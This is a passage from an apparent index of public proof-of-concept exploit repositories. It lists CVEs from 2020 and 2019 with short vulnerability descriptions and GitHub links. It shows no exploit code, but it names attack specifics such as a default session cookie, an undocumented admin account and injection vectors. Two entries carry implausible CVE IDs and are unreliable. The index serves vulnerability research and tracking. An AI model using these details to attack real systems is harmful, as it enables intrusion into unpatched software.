The td-agent-builder plugin before 2020-12-18 for Fluentd allows attackers to gain privileges because the bin directory is writable by a user account, but a file in bin is executed as NT AUTHORITY\SYSTEM.
- [zubrahzz/FluentD-TD-agent-Exploit-CVE-2020-28169](https://github.com/zubrahzz/FluentD-TD-agent-Exploit-CVE-2020-28169)
### CVE-2020-28243 (2021-02-27)
An issue was discovered in SaltStack Salt before 3002.5. The minion's restartcheck is vulnerable to command injection via a crafted process name. This allows for a local privilege escalation by any user able to create a files on the minion in a non-blacklisted directory.
- [stealthcopter/CVE-2020-28243](https://github.com/stealthcopter/CVE-2020-28243)
### CVE-2020-28328 (2020-11-06)
SuiteCRM before 7.11.17 is vulnerable to remote code execution via the system settings Log File Name setting. In certain circumstances involving admin account takeover, logger_file_name can refer to an attacker-controlled .php file under the web root.
- [mcorybillington/SuiteCRM-RCE](https://github.com/mcorybillington/SuiteCRM-RCE)
### CVE-2020-28351 (2020-11-09)
The conferencing component on Mitel ShoreTel 19.46.1802.0 devices could allow an unauthenticated attacker to conduct a reflected cross-site scripting (XSS) attack (via the PATH_INFO to index.php) due to insufficient validation for the time_zone object in the HOME_MEETING& page.
- [dievus/CVE-2020-28351](https://github.com/dievus/CVE-2020-28351)
### CVE-2020-28414 (2020-11-12)
A reflected cross-site scripting (XSS) vulnerability exists in the TranzWare Payment Gateway 3.1.12.3.2. A remote unauthenticated attacker is able to execute arbitrary HTML code via crafted url (different vector than CVE-2020-28415).
- [jet-pentest/CVE-2020-28414](https://github.com/jet-pentest/CVE-2020-28414)
### CVE-2020-28415 (2020-11-12)
A reflected cross-site scripting (XSS) vulnerability exists in the TranzWare Payment Gateway 3.1.12.3.2. A remote unauthenticated attacker is able to execute arbitrary HTML code via crafted url (different vector than CVE-2020-28414).
- [jet-pentest/CVE-2020-28415](https://github.com/jet-pentest/CVE-2020-28415)
### CVE-2020-28458 (2020-12-16)
All versions of package datatables.net are vulnerable to Prototype Pollution due to an incomplete fix for https://snyk.io/vuln/SNYK-JS-DATATABLESNET-598806.
- [fazilbaig1/CVE-2020-28458](https://github.com/fazilbaig1/CVE-2020-28458)
### CVE-2020-28478 (2021-01-19)
This affects the package gsap before 3.6.0.
- [NetJBS/CVE-2020-28478--PoC](https://github.com/NetJBS/CVE-2020-28478--PoC)
### CVE-2020-28488
- [rafaelcintralopes/CVE-2020-28488](https://github.com/rafaelcintralopes/CVE-2020-28488)
### CVE-2020-28502 (2021-03-05)
This affects the package xmlhttprequest before 1.7.0; all versions of package xmlhttprequest-ssl. Provided requests are sent synchronously (async=False on xhr.open), malicious user input flowing into xhr.send could result in arbitrary code being injected and run.
- [s-index/CVE-2020-28502](https://github.com/s-index/CVE-2020-28502)
- [dpredrag/CVE-2020-28502](https://github.com/dpredrag/CVE-2020-28502)
### CVE-2020-28647 (2020-11-17)
In Progress MOVEit Transfer before 2020.1, a malicious user could craft and store a payload within the application. If a victim within the MOVEit Transfer instance interacts with the stored payload, it could invoke and execute arbitrary code within the context of the victim's browser (XSS).
- [SECFORCE/Progress-MOVEit-Transfer-2020.1-Stored-XSS-CVE-2020-28647](https://github.com/SECFORCE/Progress-MOVEit-Transfer-2020.1-Stored-XSS-CVE-2020-28647)
### CVE-2020-28653 (2021-02-03)
Zoho ManageEngine OpManager Stable build before 125203 (and Released build before 125233) allows Remote Code Execution via the Smart Update Manager (SUM) servlet.
- [tuo4n8/CVE-2020-28653](https://github.com/tuo4n8/CVE-2020-28653)
- [intrigueio/cve-2020-28653-poc](https://github.com/intrigueio/cve-2020-28653-poc)
- [mr-r3bot/ManageEngine-CVE-2020-28653](https://github.com/mr-r3bot/ManageEngine-CVE-2020-28653)
### CVE-2020-28874 (2021-01-21)
reset-password.php in ProjectSend before r1295 allows remote attackers to reset a password because of incorrect business logic. Errors are not properly considered (an invalid token parameter).
- [varandinawer/CVE-2020-28874](https://github.com/varandinawer/CVE-2020-28874)
### CVE-2020-28926 (2020-11-30)
ReadyMedia (aka MiniDLNA) before versions 1.3.0 allows remote code execution. Sending a malicious UPnP HTTP request to the miniDLNA service using HTTP chunked encoding can lead to a signedness bug resulting in a buffer overflow in calls to memcpy/memmove.
- [lorsanta/exploit-CVE-2020-28926](https://github.com/lorsanta/exploit-CVE-2020-28926)
### CVE-2020-28948 (2020-11-19)
Archive_Tar through 1.4.10 allows an unserialization attack because phar: is blocked but PHAR: is not blocked.
- [0x240x23elu/CVE-2020-28948-and-CVE-2020-28949](https://github.com/0x240x23elu/CVE-2020-28948-and-CVE-2020-28949)
- [nopdata/cve-2020-28948](https://github.com/nopdata/cve-2020-28948)
- [JinHao-L/PoC-for-CVE-2020-28948-CVE-2020-28949](https://github.com/JinHao-L/PoC-for-CVE-2020-28948-CVE-2020-28949)
### CVE-2020-29007 (2023-04-15)
The Score extension through 0.3.0 for MediaWiki has a remote code execution vulnerability due to improper sandboxing of the GNU LilyPond executable. This allows any user with an ability to edit articles (potentially including unauthenticated anonymous users) to execute arbitrary Scheme or shell code by using crafted {{Image data to generate musical scores containing malicious code.
- [seqred-s-a/cve-2020-29007](https://github.com/seqred-s-a/cve-2020-29007)
### CVE-2020-29070 (2020-11-25)
osCommerce 2.3.4.1 has XSS vulnerability via the authenticated user entering the XSS payload into the title section of newsletters.
- [aslanemre/cve-2020-29070](https://github.com/aslanemre/cve-2020-29070)
### CVE-2020-29134 (2021-03-05)
The TOTVS Fluig platform allows path traversal through the parameter "file = .. /" encoded in base64. This affects all versions Fluig Lake 1.7.0, Fluig 1.6.5 and Fluig 1.6.4
- [Ls4ss/CVE-2020-29134](https://github.com/Ls4ss/CVE-2020-29134)
### CVE-2020-29156 (2020-12-27)
The WooCommerce plugin before 4.7.0 for WordPress allows remote attackers to view the status of arbitrary orders via the order_id parameter in a fetch_order_status action.
- [Ko-kn3t/CVE-2020-29156](https://github.com/Ko-kn3t/CVE-2020-29156)
### CVE-2020-29254 (2020-12-11)
TikiWiki 21.2 allows templates to be edited without CSRF protection. This could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack and perform arbitrary actions on an affected system. The vulnerability is due to insufficient CSRF protections for the web-based management interface of the affected system. An attacker could exploit this vulnerability by persuading a user of the interface to follow a maliciously crafted link. A successful exploit could allow the attacker to perform arbitrary actions on an affected system with the privileges of the user. These action include allowing attackers to submit their own code through an authenticated user resulting in local file Inclusion. If an authenticated user who is able to edit TikiWiki templates visits an malicious website, template code can be edited.
- [S1lkys/CVE-2020-29254](https://github.com/S1lkys/CVE-2020-29254)
### CVE-2020-29364 (2020-11-30)
In NetArt News Lister 1.0.0, the news headlines vulnerable to stored xss attacks. Attackers can inject codes in news titles.
- [aslanemre/CVE-2020-29364](https://github.com/aslanemre/CVE-2020-29364)
### CVE-2020-29370 (2020-11-28)
An issue was discovered in kmem_cache_alloc_bulk in mm/slub.c in the Linux kernel before 5.5.11. The slowpath lacks the required TID increment, aka CID-fd4d9c7d0c71.
- [nanopathi/linux-4.19.72_CVE-2020-29370](https://github.com/nanopathi/linux-4.19.72_CVE-2020-29370)
### CVE-2020-29583 (2020-12-22)
Firmware version 4.60 of Zyxel USG devices contains an undocumented account (zyfwp) with an unchangeable password. The password for this account can be found in cleartext in the firmware. This account can be used by someone to login to the ssh server or web interface with admin privileges.
- [ruppde/scan_CVE-2020-29583](https://github.com/ruppde/scan_CVE-2020-29583)
### CVE-2020-29599 (2020-12-07)
ImageMagick before 6.9.11-40 and 7.x before 7.0.10-40 mishandles the -authenticate option, which allows setting a password for password-protected PDF files. The user-controlled password was not properly escaped/sanitized and it was therefore possible to inject additional shell commands via coders/pdf.c.
- [lnwza0x0a/CVE-2020-29599](https://github.com/lnwza0x0a/CVE-2020-29599)
### CVE-2020-29607 (2020-12-16)
A file upload restriction bypass vulnerability in Pluck CMS before 4.7.13 allows an admin privileged user to gain access in the host through the "manage files" functionality, which may result in remote code execution.
- [0xAbbarhSF/CVE-2020-29607](https://github.com/0xAbbarhSF/CVE-2020-29607)
- [0xN7y/CVE-2020-29607](https://github.com/0xN7y/CVE-2020-29607)
### CVE-2020-29661 (2020-12-09)
A locking issue was discovered in the tty subsystem of the Linux kernel through 5.9.13. drivers/tty/tty_jobctrl.c allows a use-after-free attack against TIOCSPGRP, aka CID-54ffccbf053b.
- [wojkos9/arm-CVE-2020-29661](https://github.com/wojkos9/arm-CVE-2020-29661)
- [TLD1027/CVE-2020-29661](https://github.com/TLD1027/CVE-2020-29661)
### CVE-2020-29666 (2020-12-10)
In Lan ATMService M3 ATM Monitoring System 6.1.0, due to a directory-listing vulnerability, a remote attacker can view log files, located in /websocket/logs/, that contain a user's cookie values and the predefined developer's cookie value.
- [jet-pentest/CVE-2020-29666](https://github.com/jet-pentest/CVE-2020-29666)
### CVE-2020-29667 (2020-12-10)
In Lan ATMService M3 ATM Monitoring System 6.1.0, a remote attacker able to use a default cookie value, such as PHPSESSID=LANIT-IMANAGER, can achieve control over the system because of Insufficient Session Expiration.
- [jet-pentest/CVE-2020-29667](https://github.com/jet-pentest/CVE-2020-29667)
### CVE-2020-29669 (2020-12-14)
In the Macally WIFISD2-2A82 Media and Travel Router 2.000.010, the Guest user is able to reset its own password. This process has a vulnerability which can be used to take over the administrator account and results in shell access. As the admin user may read the /etc/shadow file, the password hashes of each user (including root) can be dumped. The root hash can be cracked easily which results in a complete system compromise.
- [code-byter/CVE-2020-29669](https://github.com/code-byter/CVE-2020-29669)
### CVE-2020-35191 (2020-12-17)
The official drupal docker images before 8.5.10-fpm-alpine (Alpine specific) contain a blank password for a root user. System using the drupal docker container deployed by affected versions of the docker image may allow a remote attacker to achieve root access with a blank password.
- [megadimenex/MegaHiDocker](https://github.com/megadimenex/MegaHiDocker)
### CVE-2020-35262 (2021-01-06)
Cross Site Scripting (XSS) vulnerability in Digisol DG-HR3400 can be exploited via the NTP server name in Time and date module and "Keyword" in URL Filter.
- [the-girl-who-lived/CVE-2020-35262](https://github.com/the-girl-who-lived/CVE-2020-35262)
### CVE-2020-35314 (2021-04-20)
A remote code execution vulnerability in the installUpdateThemePluginAction function in index.php in WonderCMS 3.1.3, allows remote attackers to upload a custom plugin which can contain arbitrary code and obtain a webshell via the theme/plugin installer.
- [ybdegit2020/wonderplugin](https://github.com/ybdegit2020/wonderplugin)
- [AkashLingayat/WonderCMS-CVE-2020-35314](https://github.com/AkashLingayat/WonderCMS-CVE-2020-35314)
### CVE-2020-35391 (2021-01-01)
Tenda N300 F3 12.01.01.48 devices allow remote attackers to obtain sensitive information (possibly including an http_passwd line) via a direct request for cgi-bin/DownloadCfg/RouterCfm.cfg, a related issue to CVE-2017-14942. NOTE: the vulnerability report may suggest that either a ? character must be placed after the RouterCfm.cfg filename, or that the HTTP request headers must be unusual, but it is not known why these are relevant to the device's HTTP response behavior.
- [dumitory-dev/CVE-2020-35391-POC](https://github.com/dumitory-dev/CVE-2020-35391-POC)
- [H454NSec/CVE-2020-35391](https://github.com/H454NSec/CVE-2020-35391)
### CVE-2020-35476 (2020-12-16)
A remote code execution vulnerability occurs in OpenTSDB through 2.4.0 via command injection in the yrange parameter. The yrange value is written to a gnuplot file in the /tmp directory. This file is then executed via the mygnuplot.sh shell script. (tsd/GraphHandler.java attempted to prevent command injections by blocking backticks but this is insufficient.)
- [glowbase/CVE-2020-35476](https://github.com/glowbase/CVE-2020-35476)
### CVE-2020-35488 (2021-01-05)
The fileop module of the NXLog service in NXLog Community Edition 2.10.2150 allows remote attackers to cause a denial of service (daemon crash) via a crafted Syslog payload to the Syslog service. This attack requires a specific configuration. Also, the name of the directory created must use a Syslog field. (For example, on Linux it is not possible to create a .. directory. On Windows, it is not possible to create a CON directory.)
- [GuillaumePetit84/CVE-2020-35488](https://github.com/GuillaumePetit84/CVE-2020-35488)
- [githubfoam/nxlog-ubuntu-githubactions](https://github.com/githubfoam/nxlog-ubuntu-githubactions)
### CVE-2020-35489 (2020-12-17)
The contact-form-7 (aka Contact Form 7) plugin before 5.3.2 for WordPress allows Unrestricted File Upload and remote code execution because a filename may contain special characters.
- [dn9uy3n/Check-WP-CVE-2020-35489](https://github.com/dn9uy3n/Check-WP-CVE-2020-35489)
- [X0UCYB3R/Check-WP-CVE-2020-35489](https://github.com/X0UCYB3R/Check-WP-CVE-2020-35489)
- [reneoliveirajr/wp_CVE-2020-35489_checker](https://github.com/reneoliveirajr/wp_CVE-2020-35489_checker)
- [Cappricio-Securities/CVE-2020-35489](https://github.com/Cappricio-Securities/CVE-2020-35489)
### CVE-2020-35498 (2021-02-11)
A vulnerability was found in openvswitch. A limitation in the implementation of userspace packet parsing can allow a malicious user to send a specially crafted packet causing the resulting megaflow in the kernel to be too wide, potentially causing a denial of service. The highest threat from this vulnerability is to system availability.
- [freddierice/cve-2020-35498-flag](https://github.com/freddierice/cve-2020-35498-flag)
### CVE-2020-35545 (2020-12-17)
Time-based SQL injection exists in Spotweb 1.4.9 via the query string.
- [bousalman/CVE-2020-35545](https://github.com/bousalman/CVE-2020-35545)
### CVE-2020-35575 (2020-12-26)
A password-disclosure issue in the web interface on certain TP-Link devices allows a remote attacker to get full administrative access to the web panel. This affects WA901ND devices before 3.16.9(201211) beta, and Archer C5, Archer C7, MR3420, MR6400, WA701ND, WA801ND, WDR3500, WDR3600, WE843N, WR1043ND, WR1045ND, WR740N, WR741ND, WR749N, WR802N, WR840N, WR841HP, WR841N, WR842N, WR842ND, WR845N, WR940N, WR941HP, WR945N, WR949N, and WRD4300 devices.
- [dylvie/CVE-2020-35575-TP-LINK-TL-WR841ND-password-disclosure](https://github.com/dylvie/CVE-2020-35575-TP-LINK-TL-WR841ND-password-disclosure)
### CVE-2020-35590 (2020-12-21)
LimitLoginAttempts.php in the limit-login-attempts-reloaded plugin before 2.17.4 for WordPress allows a bypass of (per IP address) rate limits because the X-Forwarded-For header can be forged. When the plugin is configured to accept an arbitrary header for the client source IP address, a malicious user is not limited to perform a brute force attack, because the client IP header accepts any arbitrary string. When randomizing the header input, the login count does not ever reach the maximum allowed retries.
- [N4nj0/CVE-2020-35590](https://github.com/N4nj0/CVE-2020-35590)
### CVE-2020-35606 (2020-12-21)
Arbitrary command execution can occur in Webmin through 1.962. Any user authorized for the Package Updates module can execute arbitrary commands with root privileges via vectors involving %0A and %0C. NOTE: this issue exists because of an incomplete fix for CVE-2019-12840.
- [anasbousselham/webminscan](https://github.com/anasbousselham/webminscan)
### CVE-2020-35669 (2020-12-24)
An issue was discovered in the http package through 0.12.2 for Dart. If the attacker controls the HTTP method and the app is using Request directly, it's possible to achieve CRLF injection in an HTTP request.
- [n0npax/CVE-2020-35669](https://github.com/n0npax/CVE-2020-35669)
### CVE-2020-35682 (2021-03-13)
Zoho ManageEngine ServiceDesk Plus before 11134 allows an Authentication Bypass (only during SAML login).
- [its-arun/CVE-2020-35682](https://github.com/its-arun/CVE-2020-35682)
### CVE-2020-35713 (2020-12-26)
Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page.
- [Al1ex/CVE-2020-35713](https://github.com/Al1ex/CVE-2020-35713)
### CVE-2020-35717 (2021-01-01)
zonote through 0.4.0 allows XSS via a crafted note, with resultant Remote Code Execution (because nodeIntegration in webPreferences is true).
- [hmartos/cve-2020-35717](https://github.com/hmartos/cve-2020-35717)
- [Redfox-Secuirty/Hacking-Electron-Apps-CVE-2020-35717-](https://github.com/Redfox-Secuirty/Hacking-Electron-Apps-CVE-2020-35717-)
### CVE-2020-35728 (2020-12-27)
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool (aka embedded Xalan in org.glassfish.web/javax.servlet.jsp.jstl).
- [Al1ex/CVE-2020-35728](https://github.com/Al1ex/CVE-2020-35728)
### CVE-2020-35729 (2020-12-27)
KLog Server 2.4.1 allows OS command injection via shell metacharacters in the actions/authenticate.php user parameter.
- [Al1ex/CVE-2020-35729](https://github.com/Al1ex/CVE-2020-35729)
### CVE-2020-35749 (2021-01-15)
Directory traversal vulnerability in class-simple_job_board_resume_download_handler.php in the Simple Board Job plugin 2.9.3 and earlier for WordPress allows remote attackers to read arbitrary files via the sjb_file parameter to wp-admin/post.php.
- [M4xSec/Wordpress-CVE-2020-35749](https://github.com/M4xSec/Wordpress-CVE-2020-35749)
### CVE-2020-35846 (2020-12-30)
Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function.
- [JohnHammond/CVE-2020-35846](https://github.com/JohnHammond/CVE-2020-35846)
- [0z09e/CVE-2020-35846](https://github.com/0z09e/CVE-2020-35846)
### CVE-2020-35847 (2020-12-30)
Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function.
- [w33vils/CVE-2020-35847_CVE-2020-35848](https://github.com/w33vils/CVE-2020-35847_CVE-2020-35848)
### CVE-2020-36079 (2021-02-26)
Zenphoto through 1.5.7 is affected by authenticated arbitrary file upload, leading to remote code execution. The attacker must navigate to the uploader plugin, check the elFinder box, and then drag and drop files into the Files(elFinder) portion of the UI. This can, for example, place a .php file in the server's uploaded/ directory. NOTE: the vendor disputes this because exploitation can only be performed by an admin who has "lots of other possibilities to harm a site.
- [azizalshammari/CVE-2020-36079.](https://github.com/azizalshammari/CVE-2020-36079.)
### CVE-2020-36109 (2021-02-01)
ASUS RT-AX86U router firmware below version under 9.0.0.4_386 has a buffer overflow in the blocking_request.cgi function of the httpd module that can cause code execution when an attacker constructs malicious data.
- [tin-z/CVE-2020-36109-POC](https://github.com/tin-z/CVE-2020-36109-POC)
- [sunn1day/CVE-2020-36109-POC](https://github.com/sunn1day/CVE-2020-36109-POC)
### CVE-2020-36179 (2021-01-06)
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS.
- [Al1ex/CVE-2020-36179](https://github.com/Al1ex/CVE-2020-36179)
### CVE-2020-36184 (2021-01-06)
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource.
- [Al1ex/CVE-2020-36184](https://github.com/Al1ex/CVE-2020-36184)
### CVE-2020-36188 (2021-01-06)
FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource.
- [Al1ex/CVE-2020-36188](https://github.com/Al1ex/CVE-2020-36188)
### CVE-2020-36287 (2021-04-09)
The dashboard gadgets preference resource of the Atlassian gadgets plugin used in Jira Server and Jira Data Center before version 8.13.5, and from version 8.14.0 before version 8.15.1 allows remote anonymous attackers to obtain gadget related settings via a missing permissions check.
- [f4rber/CVE-2020-36287](https://github.com/f4rber/CVE-2020-36287)
### CVE-2020-36518 (2022-03-11)
jackson-databind before 2.13.0 allows a Java StackOverflow exception and denial of service via a large depth of nested objects.
- [ghillert/boot-jackson-cve](https://github.com/ghillert/boot-jackson-cve)
### CVE-2020-36603 (2022-09-14)
The HoYoVerse (formerly miHoYo) Genshin Impact mhyprot2.sys 1.0.0.0 anti-cheat driver does not adequately restrict unprivileged function calls, allowing local, unprivileged users to execute arbitrary code with SYSTEM privileges on Microsoft Windows systems. The mhyprot2.sys driver must first be installed by a user with administrative privileges.
- [gmh5225/CVE-2020-36603](https://github.com/gmh5225/CVE-2020-36603)
### CVE-2020-36730 (2023-06-07)
The CMP for WordPress is vulnerable to authorization bypass due to a missing capability check on the cmp_get_post_detail(), niteo_export_csv(), and cmp_disable_comingsoon_ajax() functions in versions up to, and including, 3.8.1. This makes it possible for unauthenticated attackers to read posts, export subscriber lists, and/or deactivate the plugin.
- [RandomRobbieBF/CVE-2020-36730](https://github.com/RandomRobbieBF/CVE-2020-36730)
### CVE-2020-36732 (2023-06-12)
The crypto-js package before 3.2.1 for Node.js generates random numbers by concatenating the string "0." with an integer, which makes the output more predictable than necessary.
- [miguelc49/CVE-2020-36732-2](https://github.com/miguelc49/CVE-2020-36732-2)
- [miguelc49/CVE-2020-36732-1](https://github.com/miguelc49/CVE-2020-36732-1)
### CVE-2020-72381
- [jdordonezn/CVE-2020-72381](https://github.com/jdordonezn/CVE-2020-72381)
### CVE-2020-256480
- [dim0x69/cve-2022-25640-exploit](https://github.com/dim0x69/cve-2022-25640-exploit)
## 2019
### CVE-2019-0053 (2019-07-11)
Insufficient validation of environment variables in the telnet client supplied in Junos OS can lead to stack-based buffer overflows, which can be exploited to bypass veriexec restrictions on Junos OS. A stack-based overflow is present in the handling of environment variables when connecting via the telnet client to remote telnet servers. This issue only affects the telnet client — accessible from the CLI or shell — in Junos OS. Inbound telnet services are not affected by this issue. This issue affects: Juniper Networks Junos OS: 12.3 versions prior to 12.3R12-S13; 12.3X48 versions prior to 12.3X48-D80; 14.1X53 versions prior to 14.1X53-D130, 14.1X53-D49; 15.1 versions prior to 15.1F6-S12, 15.1R7-S4; 15.1X49 versions prior to 15.1X49-D170; 15.1X53 versions prior to 15.1X53-D237, 15.1X53-D496, 15.1X53-D591, 15.1X53-D69; 16.1 versions prior to 16.1R3-S11, 16.1R7-S4; 16.2 versions prior to 16.2R2-S9; 17.1 versions prior to 17.1R3; 17.2 versions prior to 17.2R1-S8, 17.2R2-S7, 17.2R3-S1; 17.3 versions prior to 17.3R3-S4; 17.4 versions prior to 17.4R1-S6, 17.4R2-S3, 17.4R3; 18.1 versions prior to 18.1R2-S4, 18.1R3-S3; 18.2 versions prior to 18.2R1-S5, 18.2R2-S2, 18.2R3; 18.2X75 versions prior to 18.2X75-D40; 18.3 versions prior to 18.3R1-S3, 18.3R2; 18.4 versions prior to 18.4R1-S2, 18.4R2.
- [dreamsmasher/inetutils-CVE-2019-0053-Patched-PKGBUILD](https://github.com/dreamsmasher/inetutils-CVE-2019-0053-Patched-PKGBUILD)
### CVE-2019-0162 (2019-04-17)
Memory access in virtual memory mapping for some microprocessors may allow an authenticated user to potentially enable information disclosure via local access.
- [saadislamm/SPOILER](https://github.com/saadislamm/SPOILER)
### CVE-2019-0192 (2019-03-07)
In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows to configure the JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side.
- [mpgn/CVE-2019-0192](https://github.com/mpgn/CVE-2019-0192)
- [Rapidsafeguard/Solr-RCE-CVE-2019-0192](https://github.com/Rapidsafeguard/Solr-RCE-CVE-2019-0192)
### CVE-2019-0193 (2019-08-01)
In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.
- [xConsoIe/CVE-2019-0193](https://github.com/xConsoIe/CVE-2019-0193)
- [jas502n/CVE-2019-0193](https://github.com/jas502n/CVE-2019-0193)
- [1135/solr_exploit](https://github.com/1135/solr_exploit)
- [jaychouzzk/CVE-2019-0193-exp](https://github.com/jaychouzzk/CVE-2019-0193-exp)
- [freeFV/ApacheSolrRCE](https://github.com/freeFV/ApacheSolrRCE)
### CVE-2019-0211 (2019-04-08)
In Apache HTTP Server 2.4 releases 2.4.17 to 2.4.38, with MPM event, worker or prefork, code executing in less-privileged child processes or threads (including scripts executed by an in-process scripting interpreter) could execute arbitrary code with the privileges of the parent process (usually root) by manipulating the scoreboard. Non-Unix systems are not affected.
- [ozkanbilge/Apache-Exploit-2019](https://github.com/ozkanbilge/Apache-Exploit-2019)
### CVE-2019-0217 (2019-04-08)
In Apache HTTP Server 2.4 release 2.4.38 and prior, a race condition in mod_auth_digest when running in a threaded server could allow a user with valid credentials to authenticate using another username, bypassing configured access control restrictions.
- [savsch/PoC_CVE-2019-0217](https://github.com/savsch/PoC_CVE-2019-0217)
### CVE-2019-0227 (2019-05-01)
A Server Side Request Forgery (SSRF) vulnerability affected the Apache Axis 1.4 distribution that was last released in 2006. Security and bug commits commits continue in the projects Axis 1.x Subversion repository, legacy users are encouraged to build from source. The successor to Axis 1.x is Axis2, the latest version is 1.7.9 and is not vulnerable to this issue.
- [ianxtianxt/cve-2019-0227](https://github.com/ianxtianxt/cve-2019-0227)
### CVE-2019-0230 (2020-09-14)
Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.
- [PrinceFPF/CVE-2019-0230](https://github.com/PrinceFPF/CVE-2019-0230)
- [ramoncjs3/CVE-2019-0230](https://github.com/ramoncjs3/CVE-2019-0230)
- [f8al/CVE-2019-0230-PoC](https://github.com/f8al/CVE-2019-0230-PoC)
- [Al1ex/CVE-2019-0230](https://github.com/Al1ex/CVE-2019-0230)
- [tw-eason-tseng/CVE-2019-0230_Struts2S2-059](https://github.com/tw-eason-tseng/CVE-2019-0230_Struts2S2-059)
### CVE-2019-0232 (2019-04-15)
When running on Windows with enableCmdLineArguments enabled, the CGI Servlet in Apache Tomcat 9.0.0.M1 to 9.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 is vulnerable to Remote Code Execution due to a bug in the way the JRE passes command line arguments to Windows. The CGI Servlet is disabled by default. The CGI option enableCmdLineArguments is disable by default in Tomcat 9.0.x (and will be disabled by default in all versions in response to this vulnerability). For a detailed explanation of the JRE behaviour, see Markus Wulftange's blog (https://codewhitesec.blogspot.com/2016/02/java-and-command-line-injections-in-windows.html) and this archived MSDN blog (https://web.archive.org/web/20161228144344/https://blogs.msdn.microsoft.com/twistylittlepassagesallalike/2011/04/23/everyone-quotes-command-line-arguments-the-wrong-way/).
- [pyn3rd/CVE-2019-0232](https://github.com/pyn3rd/CVE-2019-0232)
- [jas502n/CVE-2019-0232](https://github.com/jas502n/CVE-2019-0232)
- [cyy95/CVE-2019-0232-EXP](https://github.com/cyy95/CVE-2019-0232-EXP)
- [setrus/CVE-2019-0232](https://github.com/setrus/CVE-2019-0232)
- [Nicoslo/Windows-exploitation-Apache-Tomcat-8.5.19-CVE-2019-0232-](https://github.com/Nicoslo/Windows-exploitation-Apache-Tomcat-8.5.19-CVE-2019-0232-)
- [Nicoslo/Windows-Exploitation-Web-Server-Tomcat-8.5.39-CVE-2019-0232](https://github.com/Nicoslo/Windows-Exploitation-Web-Server-Tomcat-8.5.39-CVE-2019-0232)
- [jaiguptanick/CVE-2019-0232](https://github.com/jaiguptanick/CVE-2019-0232)
- [xsxtw/CVE-2019-0232](https://github.com/xsxtw/CVE-2019-0232)
### CVE-2019-0539 (2019-01-08)
A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka "Chakra Scripting Engine Memory Corruption Vulnerability." This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2019-0567, CVE-2019-0568.
- [0x43434343/CVE-2019-0539](https://github.com/0x43434343/CVE-2019-0539)
### CVE-2019-0567 (2019-01-08)
A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka "Chakra Scripting Engine Memory Corruption Vulnerability." This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2019-0539, CVE-2019-0568.
- [NatteeSetobol/Chakra-CVE-2019-0567](https://github.com/NatteeSetobol/Chakra-CVE-2019-0567)
- [NatteeSetobol/CVE-2019-0567-MS-Edge](https://github.com/NatteeSetobol/CVE-2019-0567-MS-Edge)
### CVE-2019-0604 (2019-03-06)
A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-0594.
- [linhlhq/CVE-2019-0604](https://github.com/linhlhq/CVE-2019-0604)
- [likekabin/CVE-2019-0604_sharepoint_CVE](https://github.com/likekabin/CVE-2019-0604_sharepoint_CVE)
- [k8gege/CVE-2019-0604](https://github.com/k8gege/CVE-2019-0604)
- [m5050/CVE-2019-0604](https://github.com/m5050/CVE-2019-0604)
- [boxhg/CVE-2019-0604](https://github.com/boxhg/CVE-2019-0604)
- [Gh0st0ne/weaponized-0604](https://github.com/Gh0st0ne/weaponized-0604)
- [davidlebr1/cve-2019-0604-SP2010-netv3.5](https://github.com/davidlebr1/cve-2019-0604-SP2010-netv3.5)
### CVE-2019-0623 (2019-03-06)
An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'.
- [Anti-ghosts/CVE-2019-0623-32-exp](https://github.com/Anti-ghosts/CVE-2019-0623-32-exp)
### CVE-2019-0678 (2019-04-08)
An elevation of privilege vulnerability exists when Microsoft Edge does not properly enforce cross-domain policies, which could allow an attacker to access information from one domain and inject it into another domain.In a web-based attack scenario, an attacker could host a website that is used to attempt to exploit the vulnerability, aka 'Microsoft Edge Elevation of Privilege Vulnerability'.
- [sharmasandeepkr/CVE-2019-0678](https://github.com/sharmasandeepkr/CVE-2019-0678)
### CVE-2019-0708 (2019-05-16)
A remote code execution vulnerability exists in Remote Desktop Services formerly known as Terminal Services when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests, aka 'Remote Desktop Services Remote Code Execution Vulnerability'.
- [hook-s3c/CVE-2019-0708-poc](https://github.com/hook-s3c/CVE-2019-0708-poc)
- [SherlockSec/CVE-2019-0708](https://github.com/SherlockSec/CVE-2019-0708)
- [yetiddbb/CVE-2019-0708-PoC](https://github.com/yetiddbb/CVE-2019-0708-PoC)
